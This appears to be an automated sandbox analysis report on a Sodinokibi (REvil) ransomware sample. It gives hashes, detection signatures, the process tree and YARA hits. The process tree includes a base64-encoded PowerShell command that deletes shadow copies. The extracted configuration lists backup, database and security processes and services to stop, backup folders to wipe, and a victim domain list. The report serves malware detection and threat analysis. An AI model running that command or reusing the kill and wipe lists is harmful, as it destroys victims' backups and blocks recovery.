
Analysis Report HAjXCphNj5.bin

Overview

General Information

Sample Name: HAjXCphNj5.bin (renamed file extension from bin to exe)
Analysis ID: 247001
MD5: f82f4f596705763a3c0124a4675d484e
SHA1: df1e8b4522bc439d338848f9a4d09d5b1c26f5da
SHA256: 6f2432e4ac98575aa653094123b478bf6c3aa9b00aaad84dfd09045a96d6b970

Most interesting Screenshot:

Detection

Sodinokibi
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Multi AV Scanner detection for submitted file
Sigma detected: Delete Shadow Copy Via Powershell
Yara detected Sodinokibi Ransomware
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Encrypted powershell cmdline option found
Found Tor onion address
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Antivirus or Machine Learning detection for unpacked file
Checks for available system drives (often done to infect USB drives)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • HAjXCphNj5.exe (PID: 3876 cmdline: 'C:\Users\user\Desktop\HAjXCphNj5.exe' MD5: F82F4F596705763A3C0124A4675D484E)
    • powershell.exe (PID: 6028 cmdline: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA== MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • unsecapp.exe (PID: 6020 cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding MD5: 9CBD3EC8D9E4F8CE54258B0573C66BEB)
  • cleanup

Malware Configuration

Threatname: Sodinokibi

{"prc": ["infopath", "onenote", "msaccess", "sqbcoreservice", "ocautoupds", "dbeng50", "bedbh", "powerpnt", "excel", "isqlplussvc", "tbirdconfig", "wordpad", "VeeamTransportSvc", "thebat", "CagService", "raw_agent_svc", "oracle", "visio", "encsvc", "ocomm", "pvlsvr", "outlook", "dbsnmp", "VeeamNFSSvc", "EnterpriseClient", "xfssvccon", "vxmon", "beserver", "mydesktopqos", "DellSystemDetect", "mspub", "firefox", "agntsvc", "vsnapvss", "sql", "VeeamDeploymentSvc", "synctime", "benetns", "ocssd", "bengien", "winword", "mydesktopservice", "thunderbird", "steam"], "sub": "4933", "svc": ["AcrSch2Svc", "VSNAPVSS", "svc$", "AcronisAgent", "VeeamTransportSvc", "MSExchange", "sql", "WSBExchange", "BackupExecAgentAccelerator", "BackupExecDiveciMediaService", "vss", "MVarmor64", "bedbg", "backup", "CAARCUpdateSvc", "PDVFSService", "MSSQL$", "stc_raw_agent", "BackupExecJobEngine", "MSExchange$", "BackupExecVSSProvider", "BackupExecRPCService", "mepocs", "MSSQL", "ARSM", "BackupExecAgentBrowser", "memtas", "BackupExecManagementService", "sophos", "veeam", "CASAD2DWebSvc", "MVArmor", "VeeamNFSSvc", "VeeamDeploymentService"], "wht": {"ext": ["theme", "deskthemepack", "icns", "cmd", "msi", "dll", "386", "com", "ics", "spl", "icl", "ico", "diagpkg", "key", "ldf", "ani", "prf", "drv", "bat", "msc", "lock", "rom", "cab", "msstyles", "sys", "rtp", "cpl", "adv", "bin", "hlp", "idx", "ocx", "wpx", "mpa", "shs", "diagcfg", "msu", "diagcab", "nls", "mod", "cur", "exe", "themepack", "ps1", "scr", "nomedia", "msp", "hta", "lnk"], "fls": ["desktop.ini", "boot.ini", "ntuser.dat", "ntldr", "ntuser.ini", "iconcache.db", "thumbs.db", "bootsect.bak", "ntuser.dat.log", "bootfont.bin", "autorun.inf"], "fld": ["$windows.~bt", "google", "msocache", "tor browser", "program files", "windows.old", "appdata", "boot", "intel", "$recycle.bin", "perflogs", "programdata", "program files (x86)", "application data", "mozilla", "system volume information", "$windows.~ws"]}, "img": 
"QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": "galleryartfair.com;myhealth.net.au;sandd.nl;devstyle.org;abogadosadomicilio.es;socstrp.org;huesges-gruppe.de;tastewilliamsburg.com;mousepad-direkt.de;drugdevice.org;fannmedias.com;haar-spange.com;n1-headache.com;thomasvicino.com;mrtour.site;marketingsulweb.com;abl1.net;adoptioperheet.fi;zflas.com;asgestion.com;corola.es;denovofoodsgroup.com;cyntox.com;tomoiyuma.com;cortec-neuro.com;hebkft.hu;labobit.it;groupe-frayssinet.fr;paradicepacks.com;coastalbridgeadvisors.com;bimnapratica.com;oneplusresource.org;launchhubl.com;zervicethai.co.th;oneheartwarriors.at;balticdermatology.lt;edelman.jp;lefumetdesdombes.com;agence-chocolat-noir.com;koko-nora.dk;kaliber.co.jp;profectis.de;zenderthelender.com;maureenbreezedancetheater.org;bloggyboulga.net;mooshine.com;hiddencitysecrets.com.au;kmbshipping.co.uk;kojima-shihou.com;coursio.com;jasonbaileystudio.com;vorotauu.ru;dlc.berlin;bunburyfreightservices.com.au;starsarecircular.org;knowledgemuseumbd.com;beyondmarcomdotcom.wordpress.com;webcodingstudio.com;raschlosser.de;plotlinecreative.com;thedad.com;kariokids.com;ncuccr.org;interactcenter.org;smejump.co.th;logopaedie-blomberg.de;mirjamholleman.nl;jameskibbie.com;toponlinecasinosuk.co.uk;houseofplus.com;promalaga.es;aakritpatel.com;bierensgebakkramen.nl;advizewealth.com;pmcimpact.com;blgr.be;lmtprovisions.com;sojamindbody.com;blumenhof-wegleitner.at;tanzschule-kieber.de;digi-talents.com;girlillamarketing.com;pelorus.group;aco-media.nl;accountancywijchen.nl;dnepr-beskid.com.ua;ledmes.ru;projetlyonturin.fr;patrickfoundation.net;ecoledansemulhouse.fr;catholicmusicfest.com;aniblinova.wordpress.com;hairnetty.wordpress.com;the-virtualizer.com;fizzl.ru;micahkoleoso.de;embracinghiscall.com;aodaichandung.com;chrissieperry.com;coding-machine.com;henricekupper.com;maryl
outaylor.com;mariposapropaneaz.com;faronics.com;christinarebuffetcourses.com;321play.com.hk;real-estate-experts.com;danholzmann.com;narcert.com;gadgetedges.com;artallnightdc.com;stefanpasch.me;shiftinspiration.com;katiekerr.co.uk;desert-trails.com;vox-surveys.com;bouldercafe-wuppertal.de;airconditioning-waalwijk.nl;happyeasterimages.org;eglectonk.online;braffinjurylawfirm.com;diversiapsicologia.es;songunceliptv.com;crediacces.com;schlafsack-test.net;nakupunafoundation.org;mediaclan.info;highlinesouthasc.com;kao.at;podsosnami.ru;praxis-foerderdiagnostik.de;pv-design.de;campus2day.de;fatfreezingmachines.com;body-armour.online;ccpbroadband.com;aglend.com.au;perbudget.com;rushhourappliances.com;osterberg.fi;vibethink.net;tandartspraktijkheesch.nl;operaslovakia.sk;colorofhorses.com;c-a.co.in;crowd-patch.co.uk;craftleathermnl.com;garage-lecompte-rouen.fr;luckypatcher-apkz.com;artotelamsterdam.com;proudground.org;mountaintoptinyhomes.com;wychowanieprzedszkolne.pl;latribuessentielle.com;stacyloeb.com;analiticapublica.es;stoeberstuuv.de;mikeramirezcpa.com;bigler-hrconsulting.ch;alhashem.net;dutchcoder.nl;christ-michael.net;entopic.com;ampisolabergeggi.it;architekturbuero-wagner.net;tux-espacios.com;sanaia.com;darnallwellbeing.org.uk;radaradvies.nl;greenpark.ch;centromarysalud.com;ditog.fr;mountsoul.de;ralister.co.uk;new.devon.gov.uk;xtptrack.com;brigitte-erler.com;licor43.de;insigniapmg.com;101gowrie.com;autodemontagenijmegen.nl;evologic-technologies.com;antonmack.de;pocket-opera.de;krlosdavid.com;wari.com.pe;grupocarvalhoerodrigues.com.br;cimanchesterescorts.co.uk;justinvieira.com;johnsonfamilyfarmblog.wordpress.com;aunexis.ch;intecwi.com;parking.netgateway.eu;americafirstcommittee.org;journeybacktolife.com;carriagehousesalonvt.com;unim.su;boompinoy.com;smokeysstoves.com;senson.fi;chatizel-paysage.fr;pcp-nc.com;finde-deine-marke.de;abogados-en-alicante.es;satyayoga.de;mediaplayertest.net;smart-light.co.uk;makeitcount.at;ungsvenskarna.se;seitzdruck.com;oemands.dk;controldekk
.com;extensionmaison.info;uimaan.fi;phantastyk.com;myteamgenius.com;bundabergeyeclinic.com.au;mooreslawngarden.com;seagatesthreecharters.com;hihaho.com;rhinosfootballacademy.com;anteniti.com;em-gmbh.ch;team-montage.dk;schutting-info.nl;daklesa.de;rostoncastings.co.uk;otto-bollmann.de;deoudedorpskernnoordwijk.nl;sauschneider.info;chaotrang.com;buroludo.nl;baustb.de;atalent.fi;alysonhoward.com;qualitus.com;centrospgolega.com;pay4essays.net;filmstreamingvfcomplet.be;cerebralforce.net;milestoneshows.com;simoneblum.de;izzi360.com;no-plans.com;international-sound-awards.com;365questions.org;myhostcloud.com;xn--thucmctc-13a1357egba.com;copystar.co.uk;naturalrapids.com;cursoporcelanatoliquido.online;actecfoundation.org;jbbjw.com;madinblack.com;lascuola.nl;harveybp.com;quickyfunds.com;hashkasolutindo.com;samnewbyjax.com;alfa-stroy72.com;southeasternacademyofprosthodontics.org;wolf-glas-und-kunst.de;rollingrockcolumbia.com;mrsfieldskc.com;bradynursery.com;mank.de;birnam-wood.com;olejack.ru;joseconstela.com;rumahminangberdaya.com;micro-automation.de;jacquin-maquettes.com;atmos-show.com;myzk.site;ausair.com.au;minipara.com;dushka.ua;lloydconstruction.com;forestlakeuca.org.au;centuryrs.com;love30-chanko.com;deko4you.at;prochain-voyage.net;richard-felix.co.uk;insidegarage.pl;bristolaeroclub.co.uk;igrealestate.com;humancondition.com;ncid.bc.ca;first-2-aid-u.com;nachhilfe-unterricht.com;pasvenska.se;restaurantesszimmer.de;leeuwardenstudentcity.nl;theletter.company;body-guards.it;bockamp.com;siluet-decor.ru;seminoc.com;onlybacklink.com;sevenadvertising.com;videomarketing.pro;eraorastudio.com;hugoversichert.de;calabasasdigest.com;ai-spt.jp;naswrrg.org;fransespiegels.nl;villa-marrakesch.de;kindersitze-vergleich.de;limassoldriving.com;helikoptervluchtnewyork.nl;autopfand24.de;lichencafe.com;tanzprojekt.com;lorenacarnero.com;trapiantofue.it;alsace-first.com;nataschawessels.com;theduke.de;ogdenvision.com;opatrovanie-ako.sk;lange.host;i-trust.dk;carrybrands.nl;ra-staudte.de;iwr.nl;zso-man
nheim.de;mindpackstudios.com;web.ion.ag;smithmediastrategies.com;smalltownideamill.wordpress.com;aarvorg.com;deschl.net;stemplusacademy.com;denifl-consulting.at;navyfederalautooverseas.com;wacochamber.com;kaminscy.com;roadwarrior.app;handi-jack-llc.com;ncs-graphic-studio.com;celeclub.org;people-biz.com;frontierweldingllc.com;zieglerbrothers.de;kostenlose-webcams.com;datacenters-in-europe.com;blood-sports.net;completeweddingkansas.com;associationanalytics.com;extraordinaryoutdoors.com;eco-southafrica.com;funjose.org.gt;westdeptfordbuyrite.com;newyou.at;gamesboard.info;vitavia.lt;lapinvihreat.fi;jolly-events.com;conasmanagement.de;marcuswhitten.site;effortlesspromo.com;xltyu.com;mdacares.com;rksbusiness.com;bodyforwife.com;mepavex.nl;jakekozmor.com;chandlerpd.com;xlarge.at;ouryoungminds.wordpress.com;levdittliv.se;liikelataamo.fi;sairaku.net;pridoxmaterieel.nl;harpershologram.wordpress.com;precisionbevel.com;citymax-cr.com;qlog.de;smogathon.com;softsproductkey.com;celularity.com;synlab.lt;berlin-bamboo-bikes.org;fotoideaymedia.es;pogypneu.sk;consultaractadenacimiento.com;jadwalbolanet.info;argos.wityu.fund;edgewoodestates.org;1kbk.com.ua;pasivect.co.uk;cirugiauretra.es;lapinlviasennus.fi;destinationclients.fr;hannah-fink.de;spsshomeworkhelp.com;executiveairllc.com;linnankellari.fi;kedak.de;forskolorna.org;yamalevents.com;tetinfo.in;microcirc.net;abuelos.com;vannesteconstruct.be;strandcampingdoonbeg.com;urmasiimariiuniri.ro;levihotelspa.fi;rebeccarisher.com;employeesurveys.com;quemargrasa.net;loprus.pl;milltimber.aberdeen.sch.uk;aselbermachen.com;steampluscarpetandfloors.com;idemblogs.com;ianaswanson.com;vesinhnha.com.vn;bafuncs.org;www1.proresult.no;mediaacademy-iraq.org;praxis-management-plus.de;edv-live.de;gmto.fr;takeflat.com;teknoz.net;uranus.nl;directwindowco.com;broseller.com;michaelsmeriglioracing.com;d1franchise.com;kaotikkustomz.com;milsing.hr;bayoga.co.uk;xn--logopdie-leverkusen-kwb.de;chavesdoareeiro.com;manijaipur.com;personalenhancementcenter.com;you-bysi
a.com.au;woodworkersolution.com;wien-mitte.co.at;ihr-news.jp;spargel-kochen.de;gporf.fr;vihannesporssi.fi;ftf.or.at;kunze-immobilien.de;sarbatkhalsafoundation.org;crosspointefellowship.church;vanswigchemdesign.com;polzine.net;bxdf.info;systemate.dk;qualitaetstag.de;littlebird.salon;waynela.com;pawsuppetlovers.com;creative-waves.co.uk;conexa4papers.trade;onlyresultsmarketing.com;nijaplay.com;pcprofessor.com;polymedia.dk;bptdmaluku.com;nvwoodwerks.com;iyahayki.nl;greenko.pl;monark.com;leather-factory.co.jp;nancy-informatique.fr;waveneyrivercentre.co.uk;homecomingstudio.com;imadarchid.com;memaag.com;cheminpsy.fr;vermoote.de;mbxvii.com;ino-professional.ru;sahalstore.com;verifort-capital.de;dekkinngay.com;vyhino-zhulebino-24.ru;newstap.com.ng;slashdb.com;beautychance.se;ivfminiua.com;manutouchmassage.com;kidbucketlist.com.au;degroenetunnel.com;lynsayshepherd.co.uk;siliconbeach-realestate.com;bouquet-de-roses.com;havecamerawilltravel2017.wordpress.com;psc.de;xoabigail.com;kath-kirche-gera.de;firstpaymentservices.com;shsthepapercut.com;shiresresidential.com;apolomarcas.com;smessier.com;cranleighscoutgroup.org;thewellnessmimi.com;commercialboatbuilding.com;htchorst.nl;norpol-yachting.com;thomas-hospital.de;DupontSellsHomes.com;tstaffing.nl;x-ray.ca;refluxreducer.com;shonacox.com;smale-opticiens.nl;hrabritelefon.hr;compliancesolutionsstrategies.com;skanah.com;craigvalentineacademy.com;better.town;deepsouthclothingcompany.com;stampagrafica.es;filmvideoweb.com;thailandholic.com;triggi.de;instatron.net;nmiec.com;higadograsoweb.com;marietteaernoudts.nl;withahmed.com;neuschelectrical.co.za;work2live.de;noixdecocom.fr;verytycs.com;turkcaparbariatrics.com;live-your-life.jp;haremnick.com;chefdays.de;shadebarandgrillorlando.com;revezlimage.com;themadbotter.com;besttechie.com;deprobatehelp.com;pivoineetc.fr;dramagickcom.wordpress.com;plastidip.com.ar;lykkeliv.net;bsaship.com;montrium.com;rozemondcoaching.nl;backstreetpub.com;mastertechengineering.com;1team.es;mirkoreisser.de;evergreen
-fishing.com;shhealthlaw.com;kevinjodea.com;wsoil.com.sg;purposeadvisorsolutions.com;gemeentehetkompas.nl;mrxermon.de;jeanlouissibomana.com;ftlc.es;gw2guilds.org;exenberger.at;greenfieldoptimaldentalcare.com;schmalhorst.de;dirittosanitario.biz;thaysa.com;geoffreymeuli.com;karacaoglu.nl;boisehosting.net;coding-marking.com;jusibe.com;collaborativeclassroom.org;botanicinnovations.com;agence-referencement-naturel-geneve.net;resortmtn.com;anthonystreetrimming.com;lucidinvestbank.com;longislandelderlaw.com;drinkseed.com;aminaboutique247.com;biortaggivaldelsa.com;morawe-krueger.de;pointos.com;bbsmobler.se;lubetkinmediacompanies.com;gasbarre.com;naturstein-hotte.de;iphoneszervizbudapest.hu;huehnerauge-entfernen.de;joyeriaorindia.com;rafaut.com;ikads.org;abitur-undwieweiter.de;julis-lsa.de;hellohope.com;dw-css.de;hushavefritid.dk;plantag.de;all-turtles.com;wmiadmin.com;lecantou-coworking.com;bargningharnosand.se;slupetzky.at;reddysbakery.com;despedidascostablanca.es;danubecloud.com;jorgobe.at;baronloan.org;ilcdover.com;run4study.com;moveonnews.com;maineemploymentlawyerblog.com;artige.com;physiofischer.de;sterlingessay.com;transportesycementoshidalgo.es;andersongilmour.co.uk;transliminaltribe.wordpress.com;officehymy.com;art2gointerieurprojecten.nl;noesis.tech;irinaverwer.com;serce.info.pl;dubnew.com;hvccfloorcare.com;piajeppesen.dk;dontpassthepepper.com;modamilyon.com;fundaciongregal.org;homesdollar.com;kuntokeskusrok.fi;dr-seleznev.com;urclan.net;urist-bogatyr.ru;streamerzradio1.site;ora-it.de;biapi-coaching.fr;vancouver-print.ca;milanonotai.it;mirjamholleman.nl;oslomf.no;klusbeter.nl;stemenstilte.nl;epwritescom.wordpress.com;seevilla-dr-sturm.at;lebellevue.fr;dubscollective.com;seproc.hn;acomprarseguidores.com;zewatchers.com;nosuchthingasgovernment.com;modelmaking.nl;cwsitservices.co.uk;stupbratt.no;ceres.org.au;calxplus.eu;helenekowalsky.com;lachofikschiet.nl;cafemattmeera.com;imaginado.de;webmaster-peloton.com;sportsmassoren.com;esope-formation.fr;asteriag.com;advokathus
et.dk;craigmccabe.fun;admos-gleitlager.de;nicoleaeschbachorg.wordpress.com;modestmanagement.com;ecopro-kanto.com;stoeferlehalle.de;rocketccw.com;tampaallen.com;fotoscondron.com;caribdoctor.org;tenacitytenfold.com;whyinterestingly.ru;triactis.com;jobcenterkenya.com;blossombeyond50.com;yousay.site;sabel-bf.com;tuuliautio.fi;ziegler-praezisionsteile.de;schmalhorst.de;cityorchardhtx.com;figura.team;4net.guru;insp.bi;i-arslan.de;saxtec.com;lusak.at;klimt2012.info;zweerscreatives.nl;candyhouseusa.com;dublikator.com;tinkoff-mobayl.ru;durganews.com;suncrestcabinets.ca;tennisclubetten.nl;schraven.de;brawnmediany.com;stingraybeach.com;theshungiteexperience.com.au;upmrkt.co;space.ua;stoneys.ch;vietlawconsultancy.com;allfortheloveofyou.com;hmsdanmark.dk;sanyue119.com;arteservicefabbro.com;cactusthebrand.com;fairfriends18.de;sw1m.ru;c2e-poitiers.com;readberserk.com;bastutunnan.se;leoben.at;highimpactoutdoors.net;stormwall.se;ki-lowroermond.nl;slwgs.org;fibrofolliculoma.info;walter-lemm.de;polychromelabs.com;parebrise-tla.fr;pmc-services.de;tanciu.com;xn--vrftet-pua.biz;remcakram.com;hatech.io;elpa.se;kamahouse.net;thee.network;kadesignandbuild.co.uk;burkert-ideenreich.de;comparatif-lave-linge.fr;jiloc.com;creamery201.com;ivivo.es;flexicloud.hk;truenyc.co;herbayupro.com;kalkulator-oszczednosci.pl;saarland-thermen-resort.com;notmissingout.com;ravensnesthomegoods.com;2ekeus.nl;paulisdogshop.de;oldschoolfun.net;naturavetal.hr;romeguidedvisit.com;maxadams.london;apprendrelaudit.com;architecturalfiberglass.org;csgospeltips.se;jvanvlietdichter.nl;pt-arnold.de;dezatec.es;solerluethi-allart.ch;drfoyle.com;anybookreader.de;woodleyacademy.org;simpliza.com;behavioralmedicinespecialists.com;crowcanyon.com;pinkexcel.com;tonelektro.nl;sinal.org;latestmodsapks.com;mardenherefordshire-pc.gov.uk;faroairporttransfers.net;saka.gr;icpcnj.org;campusoutreach.org;teresianmedia.org;pier40forall.org;theclubms.com;odiclinic.org;gasolspecialisten.se;glennroberts.co.nz;sportverein-tambach.de;devlaur.com;une
tica.fr;courteney-cox.net;allamatberedare.se;globedivers.wordpress.com;vdberg-autoimport.nl;schoolofpassivewealth.com;foryourhealth.live;babcockchurch.org;securityfmm.com;nhadatcanho247.com;amylendscrestview.com;schoellhammer.com;midmohandyman.com;fitnessingbyjessica.com;supportsumba.nl;expandet.dk;jsfg.com;darrenkeslerministries.com;easytrans.com.au;syndikat-asphaltfieber.de;outcomeisincome.com;kirkepartner.dk;irishmachineryauctions.com;layrshift.eu;oceanastudios.com;talentwunder.com;dareckleyministries.com;hotelzentral.at;maasreusel.nl;judithjansen.com;ceid.info.tr;tips.technology;erstatningsadvokaterne.dk;gaiam.nl;katketytaanet.fi;makeflowers.ru;dpo-as-a-service.com;penco.ie;plv.media;sotsioloogia.ee;d2marketing.co.uk;ohidesign.com;austinlchurch.com;bigbaguettes.eu;walkingdeadnj.com;waywithwords.net;marchand-sloboda.com;carolinepenn.com;noskierrenteria.com;charlottepoudroux-photographie.fr;bigasgrup.com;simpkinsedwards.co.uk;antiaginghealthbenefits.com;zimmerei-deboer.de;eadsmurraypugh.com;atozdistribution.co.uk;abogadoengijon.es;farhaani.com;nativeformulas.com;igorbarbosa.com;caribbeansunpoker.com;fax-payday-loans.com;presseclub-magdeburg.de;bookspeopleplaces.com;stopilhan.com;ateliergamila.com;philippedebroca.com;homng.net;almosthomedogrescue.dog;smhydro.com.pl;liveottelut.com;bodyfulls.com;solhaug.tk;alvinschwartz.wordpress.com;antenanavi.com;groupe-cets.com;gopackapp.com;socialonemedia.com;cnoia.org;slimidealherbal.com;buymedical.biz;bargningavesta.se;sla-paris.com;id-et-d.fr;maratonaclubedeportugal.com;travelffeine.com;dr-tremel-rednitzhembach.de;tigsltd.com;bricotienda.com;blog.solutionsarchitect.guru;baylegacy.com;euro-trend.pl;symphonyenvironmental.com;worldhealthbasicinfo.com;drnice.de;slimani.net;victoriousfestival.co.uk;koken-voor-baby.nl;global-kids.info;platformier.com;falcou.fr;fayrecreations.com;testzandbakmetmening.online;zonamovie21.net;tecnojobsnet.com;winrace.no;fitovitaforum.com;parkcf.nl;augenta.com;vickiegrayimages.com;hhcourier.com;div-vert
riebsforschung.de;ligiercenter-sachsen.de;muamuadolls.com;bowengroup.com.au;digivod.de;brandl-blumen.de;rerekatu.com;eaglemeetstiger.de;bingonearme.org;gonzalezfornes.es;vibehouse.rw;assurancesalextrespaille.fr;hotelsolbh.com.br;strategicstatements.com;mir-na-iznanku.com;femxarxa.cat;porno-gringo.com;scenepublique.net;delawarecorporatelaw.com;gantungankunciakrilikbandung.com;charlesreger.com;vloeren-nu.nl;lbcframingelectrical.com;luxurytv.jp;humanityplus.org;nandistribution.nl;sobreholanda.com;blewback.com;krcove-zily.eu;kikedeoliveira.com;classycurtainsltd.co.uk;wellplast.se;ventti.com.ar;simulatebrain.com;itelagen.com;promesapuertorico.com;spylista.com;waermetauscher-berechnen.de;leda-ukraine.com.ua;macabaneaupaysflechois.com;iqbalscientific.com;iwelt.de;portoesdofarrobo.com;mooglee.com;nurturingwisdom.com;spinheal.ru;sweering.fr;werkkring.nl;hardinggroup.com;rieed.de;verbisonline.com;aurum-juweliere.de;foretprivee.ca;parkstreetauto.net;mrsplans.net;nestor-swiss.ch;mytechnoway.com;liliesandbeauties.org;trulynolen.co.uk;nokesvilledentistry.com;kojinsaisei.info;dsl-ip.de;dr-pipi.de;cite4me.org;ilso.net;binder-buerotechnik.at;corendonhotels.com;roygolden.com;rota-installations.co.uk;corona-handles.com;renergysolution.com;hkr-reise.de;gratispresent.se;12starhd.online;aprepol.com;freie-gewerkschaften.de;healthyyworkout.com;miriamgrimm.de;kafu.ch;psnacademy.in;xn--singlebrsen-vergleich-nec.com;boulderwelt-muenchen-west.de;toreria.es;bauertree.com;mbfagency.com;the-domain-trader.com;mercantedifiori.com;lukeshepley.wordpress.com;baptisttabernacle.com;tongdaifpthaiphong.net;kingfamily.construction;spectrmash.ru;croftprecision.co.uk;autodujos.lt;veybachcenter.de;punchbaby.com;whittier5k.com;blacksirius.de;coffreo.biz;summitmarketingstrategies.com;edrcreditservices.nl;malychanieruchomoscipremium.com;bhwlawfirm.com;tandartspraktijkhartjegroningen.nl;financescorecard.com;xn--fn-kka.no;argenblogs.com.ar;selfoutlet.com;live-con-arte.de;4youbeautysalon.com;panelsandwichmadrid.es;
familypark40.com;marathonerpaolo.com;webhostingsrbija.rs;gymnasedumanagement.com;todocaracoles.com;jyzdesign.com;connectedace.com;id-vet.com;ussmontanacommittee.us;commonground-stories.com;teczowadolina.bytom.pl;nacktfalter.de;planchaavapor.net;brevitempore.net;wraithco.com;mylovelybluesky.com;sachnendoc.com;fiscalsort.com;spd-ehningen.de;bouncingbonanza.com;ulyssemarketing.com;amerikansktgodis.se;wurmpower.at;parks-nuernberg.de;boldcitydowntown.com;autofolierung-lu.de;allure-cosmetics.at;pubweb.carnet.hr;tinyagency.com;bogdanpeptine.ro;gastsicht.de;devok.info;caffeinternet.it;ecpmedia.vn;nuzech.com;blogdecachorros.com;cuppacap.com;enovos.de;iviaggisonciliegie.it;testcoreprohealthuk.com;kissit.ca;cuspdental.com;sexandfessenjoon.wordpress.com;xn--rumung-bua.online;jandaonline.com;deltacleta.cat;berliner-versicherungsvergleich.de;pomodori-pizzeria.de;xn--fnsterputssollentuna-39b.se;dinslips.se;theadventureedge.com;sporthamper.com;faizanullah.com;ctrler.cn;goodgirlrecovery.com;manifestinglab.com;kampotpepper.gives;nsec.se;fensterbau-ziegler.de;elimchan.com;ilive.lt;igfap.com;camsadviser.com;dutchbrewingcoffee.com;kosterra.com;makeurvoiceheard.com;basisschooldezonnewijzer.nl;tophumanservicescourses.com;heliomotion.com;bridgeloanslenders.com;lenreactiv-shop.ru;norovirus-ratgeber.de;jerling.de;grelot-home.com;associacioesportivapolitg.cat;musictreehouse.net;evangelische-pfarrgemeinde-tuniberg.de;rosavalamedahr.com;abogadosaccidentetraficosevilla.es;kisplanning.com.au;heidelbergartstudio.gallery;hokagestore.com;sagadc.com;comarenterprises.com;zimmerei-fl.de;pferdebiester.de;skiltogprint.no;trystana.com;partnertaxi.sk;hypozentrum.com;spacecitysisters.org;upplandsspar.se;pierrehale.com;huissier-creteil.com;thenewrejuveme.com;pickanose.com;mdk-mediadesign.de;heurigen-bauer.at;carlosja.com;kenhnoithatgo.com;echtveilig.nl;geekwork.pl;ruralarcoiris.com;ontrailsandboulevards.com;danskretursystem.dk;psa-sec.de;lillegrandpalais.com;torgbodenbollnas.se;sofavietxinh.com;8449nohate.or
g;troegs.com;mezhdu-delom.ru;herbstfeststaefa.ch;meusharklinithome.wordpress.com;sportiomsportfondsen.nl;vitalyscenter.es;cursosgratuitosnainternet.com;alten-mebel63.ru;hairstylesnow.site;servicegsm.net;juneauopioidworkgroup.org;y-archive.com;educar.org;ostheimer.at;sipstroysochi.ru;imperfectstore.com;cleliaekiko.online;wasmachtmeinfonds.at;lionware.de;ladelirante.fr;thedresserie.com;simplyblessedbykeepingitreal.com;daniel-akermann-architektur-und-planung.ch;otsu-bon.com;miraclediet.fun;baumkuchenexpo.jp;corelifenutrition.com;trackyourconstruction.com;friendsandbrgrs.com;stallbyggen.se;oncarrot.com;ausbeverage.com.au;finediningweek.pl;hoteledenpadova.it;mmgdouai.fr;ahouseforlease.com;markelbroch.com;mylolis.com;poultrypartners.nl;quizzingbee.com;rimborsobancario.net;solinegraphic.com;jobmap.at;puertamatic.es;asiluxury.com;kamienny-dywan24.pl;yourobgyn.net;facettenreich27.de;merzi.info;sloverse.com;retroearthstudio.com;geisterradler.de;123vrachi.ru;mapawood.com;theapifactory.com;rehabilitationcentersinhouston.net;bestbet.com;offroadbeasts.com;adultgamezone.com;pixelarttees.com;tomaso.gr;bee4win.com;tsklogistik.eu;paymybill.guru;bordercollie-nim.nl;ymca-cw.org.uk;answerstest.ru;35-40konkatsu.net;importardechina.info;delchacay.com.ar;allentownpapershow.com;innote.fi;petnest.ir;lightair.com;visiativ-industry.fr;fitnessbazaar.com;danielblum.info;hexcreatives.co;beaconhealthsystem.org;notsilentmd.org;peterstrobos.com;tarotdeseidel.com;surespark.org.uk;thefixhut.com;clos-galant.com;twohourswithlena.wordpress.com;zzyjtsgls.com;mymoneyforex.com;iyengaryogacharlotte.com;boosthybrid.com.au;appsformacpc.com;jenniferandersonwriter.com;tulsawaterheaterinstallation.com;tradiematepro.com.au;yassir.pro;castillobalduz.es;lescomtesdemean.be;freie-baugutachterpraxis.de;smartypractice.com;balticdentists.com;vetapharma.fr;galserwis.pl;lapmangfpt.info.vn;bildungsunderlebnis.haus", "dbg": false, "pid": "$2a$10$HztB2c/kKYqBugtCeu/EAukcPXt5ZMirw4PUzhgUDdH4ovsZt1pUu", "nbody": 
"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", "et": 0, "wipe": true, "wfld": ["back", "backups", "archive", "backup", "archive backup", "bckp"], "nname": "{EXT}-readme.txt", "pk": "f9FWZTEp+jwBhcV+AN1uSctgSHhfUcqwxi7aFcnHK2E=", "net": false, "exp": false, "arn": false}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.782683038.0000000002E1F000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security |
00000000.00000003.782448934.0000000002E1F000.00000004.00000040.sdmp | JoeSecurity_Sodinokibi | Yara detected Sodinokibi Ransomware | Joe Security |
